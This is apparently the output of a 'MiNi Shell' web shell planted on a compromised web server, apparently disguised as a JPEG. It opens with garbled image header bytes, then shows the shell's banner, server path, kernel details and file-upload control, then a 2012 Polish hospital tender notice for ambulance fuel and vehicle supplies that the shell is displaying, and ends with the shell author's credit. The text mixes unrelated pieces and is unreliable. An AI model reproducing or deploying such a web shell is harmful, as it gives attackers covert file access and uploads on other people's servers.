JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/393900-N-2012.html

<p class="kh_header"><b>Szamotuły: Dostawa paliw do karetek, samochodu osobowego, agregatów prądotwórczych oraz materiałów eksploatacyjnych i akcesoriów  samochodowych.</b><br>
<b>Numer ogłoszenia: 393900 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Sukiennicza 13, 64-500 Szamotuły, woj. wielkopolskie, tel. 061 2927103, faks 061 2927102.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw do karetek, samochodu osobowego, agregatów prądotwórczych oraz materiałów eksploatacyjnych i akcesoriów  samochodowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są bezgotówkowe zakupy przez kierowców Zamawiającego paliw płynnych oraz materiałów eksploatacyjnych i akcesoriów samochodowych na Stacji Paliw Wykonawcy na terenie miasta Szamotuł, umożliwiające tankowanie przez 24h na dobę, 7 dni w tygodniu.
2. Sprzedaż musi umożliwić prowadzenie ewidencji pobranego paliwa, materiałów eksploatacyjnych i akcesoriów samochodowych na poszczególny pojazd, tj.
a) data i miejsce zakupu,
b) ilość pobranego paliwa,
c) stan licznika,
d) wartość zatankowanego paliwa,
e) rodzaj i wartość materiałów eksploatacyjnych oraz akcesoriów samochodowych
3. W dniu zawarcia umowy Zamawiający przekaże wykonawcy listę z nr rejestracyjnymi pojazdów.
4. Zamówienie realizowane będzie poprzez tankowanie pojazdów Zamawiającego w stacji paliwowej Wykonawcy zlokalizowanej w odległości nie większej niż 5 km od siedziby Zamawiającego czynnej przez 24h na dobę, 7 dni w tygodniu łącznie w niedziele i święta. 
5. W razie awarii dystrybutorów Wykonawca jest obowiązany zapewnić tankowanie awaryjne. 
6. Zakupy paliwa, materiałów eksploatacyjnych i asesoriów samochodowych dokonywane będą za pomocą kart elektronicznych wystawionych przez Wykonawcę na numer rejestracyjny samochodu Zamawiającego. Karty muszą być zabezpieczone kodem PIN. Karty zostaną wydane Zamawiającemu bezpłatnie w terminie 14 dni od daty zawarcia umowy, w ilości nie więcej niż 7 sztuk.
7. Pojazdy tankowane są bezpośrednio do zbiornika pojazdu do pełna. Ilość i rodzaj tankowanego paliwa jest odnotowana na karcie. Karta  zawiera następujące dane:
liczba porządkowa, data, numer rejestracyjny pojazdu, ilość litrów pobranego paliwa oraz jego wartość, ilość,  rodzaj i wartość pobranych materiałów eksploatacyjnych i akcesoriów samochodowych.
8. Zamawiający zastrzega sobie prawo do składania zamówień bez ograniczeń, co do ilości oraz cykliczności.
9. Wykonawca  zobowiązuje się do elastycznego reagowania na zmniejszone lub zwiększone zapotrzebowanie Zamawiającego.
10. Dowody wydania paliwa, materiałów eksploatacyjnych i akcesoriów samochodowych będą stanowiły podstawę do wystawienia faktury VAT. 
11. Na żądanie Zamawiającego, Wykonawca zobowiązany jest do okazania uprawnionemu pracownikowi świadectwa jakości sprzedawanego paliwa wystawionego przez producenta.
12. W przypadku poniesienia przez Zamawiającego szkód z tytułu dostarczenia wadliwego paliwa, Zamawiającemu przysługuje prawo dochodzenia odszkodowania na zasadach ogólnych.
13.  Tankowanie oleju napędowego bez biokomponentów do agregatów prądotwórczych odbywać się bedzie w siedzibie Zamawiającego bezpośrednio z cysterny samochodowej, przewidywane 3 tankowania w roku lub poprzez tankowanie do kanistrów.
14. Zapotrzebowanie na paliwa określa poniższa tabela:
Rodzaj paliwa	
Zapotrzebowanie 12 miesięczne
Olej napędowy bez biokomponentów
PN-EN 590
Kod CPV 09134100	
maksymalnie 48.000 litrów, w tym 1.500 litrów do agregatów prądotwórczych tankowane z cysterny samochodowej  w siedzibie Zamawiającego
Benzyna bezołowiowa 95         
PN-EN 228
Kod CPV 09132100	
maksymalnie 1.800 litrów
15. Zapotrzebowanie na materiały eksploatacyjne określa tabela: Załącznik nr 7
16. Zamawiający dopuszcza możliwość zaoferowania artykułów równoważnych do wskazanych w załączniku nr 7 pod warunkiem, że artykuł równoważny będzie posiadać parametry wskazane przez Zamawiającego lub lepsze. W przypadku zaoferowania przez Wykonawcę artykułu równoważnego należy podać nazwę artykułu  równoważnego, jego producenta oraz pozycję, której rozwiązanie równoważne dotyczy. Wszystkie nazwy podane przez Zamawiającego w załącznikach do specyfikacji istotnych warunków zamówienia należy traktować jako standardy jakościowe.
17. Zamawiający przewiduje możliwość udzielania zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt.  7 uPzp, do 50%.
18. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamawianych artykułów zarówno paliwa do karetek jak i materiałów eksploatacyjnych oraz akcesoriów samochodowych w poszczególnych pozycjach w przypadku ograniczenia ich stosowania do 50%.
Przedmiot zamówienia musi spełniać wymagania określone w stosownych normach, 
w szczególności: 
dla benzyny bezołowiowej Pb95 PN-EN 228 Paliwa dla pojazdów silnikowych - Benzyna bezołowiowa - Wymagania i metody badań,
dla oleju napędowego ON PN-EN 590 Paliwa do pojazdów silnikowych - Oleje napędowe - Wymagania i metody badań, z uwzględnieniem rozporządzenia Ministra Gospodarki  z dnia 09 grudnia 2008 r. w sprawie wymagań jakościowych dla paliw ciekłych Dz. U. Nr 221 poz. 1441, ze zm.
Zamawiający nie dopuszcza możliwości składania oferty wariantowej. 
Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt.  7 uPzp (do 50%).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4, 34.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia przez Wykonawcę wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca posiada koncesję na obrót paliwami płynnymi zgodnie z ustawą z dnia 10.04.1997 r. Prawo energetyczne (t.j. Dz. U. z 2006 r., Nr 89, poz. 625 z późn. zm.) ważnej przez cały okres wykonywania zamówienia. W przypadku, gdy termin posiadanej przez Wykonawcę aktualnie koncesji wygasnąć ma w trakcie realizacji zamówienia, Wykonawca powinien załączyć do oferty oświadczenie, w którym zobowiązuje się przedłużyć koncesję na obrót paliwami, co najmniej do końca trwania realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku. Wystarczającym będzie złożenie oświadczenia (zał. do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca będzie dysponował, co najmniej jedną stacją paliw czynną 24 godziny na dobę w odległości nie większej niż 5 km od siedziby Zamawiającego licząc po drogach utwardzonych (z uwagi na konieczność zapewnienia sprawnego funkcjonowania taboru - nagłe wezwania, wypadki, zdarzenia losowe, itp.) Zamawiający nie posiada magazynów, tankowanie pojazdów będzie odbywać się w sposób ciągły, sukcesywnie wg. bieżących potrzeb na terenie stacji paliw Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia-posiadają środki finansowe lub zdolność kredytową w kwocie  30.000 zł. (brutto). Zamawiający uzna warunek za spełniony, gdy Wykonawca załączy do oferty informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek o posiadanych środkach finansowych lub zdolności kredytowej, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykaz stacji paliw na terenie miasta Szamotuł czynnych 24 godziny na dobę, na których możliwe będzie tankowanie paliw oraz zakup materiałów eksploatacyjnych i akcesoriów samochodowych przez Zamawiającego</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony załącznik parametrów asortymentowo - ilościowo - cenowych
. Informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek o posiadanych środkach finansowych lub zdolności kredytowej, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W oparciu o art. 144 ust 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówieniach publicznych (Dz. U. 2010 nr 113 poz. 759 ze zm.) Zamawiający przewiduje możliwość dokonania zmiany umowy w sytuacji:
- zmiany powszechnie obowiązujących przepisów prawa w zakresie, w jakim zmiana ta będzie miała wpływ na realizację umowy (np. zmiana akcyzy, podatku VAT, cen producenta, itp.);
- wystąpienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy, o ile zmiany te będą dla Zamawiającego korzystne,
Zmiany te nie wymagają odrębnego aneksu.
2. Zmiana umowy dokonana z naruszeniem przepisu art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tj. Dz. U. 2010 nr 113 poz. 759, ze zm.) podlega unieważnieniu.  3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający na podstawie art.145 ust 1. pzp może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
4. W przypadku, o którym mowa wyżej wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
 5. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamawianych artykułów (zarówno paliwa do karetek jak i materiałów eksploatacyjnych oraz akcesoriów samochodowych) w poszczególnych pozycjach w przypadku ograniczenia ich stosowania (do 50%).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szamotuly.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Sukiennicza 13
64-500 Szamotuły
http://www.szamotuly.med.pl
tel.: 0-61-29-27-100
fax.: 0-61-29-27-102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Sukiennicza 13
64-500 Szamotuły
Sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com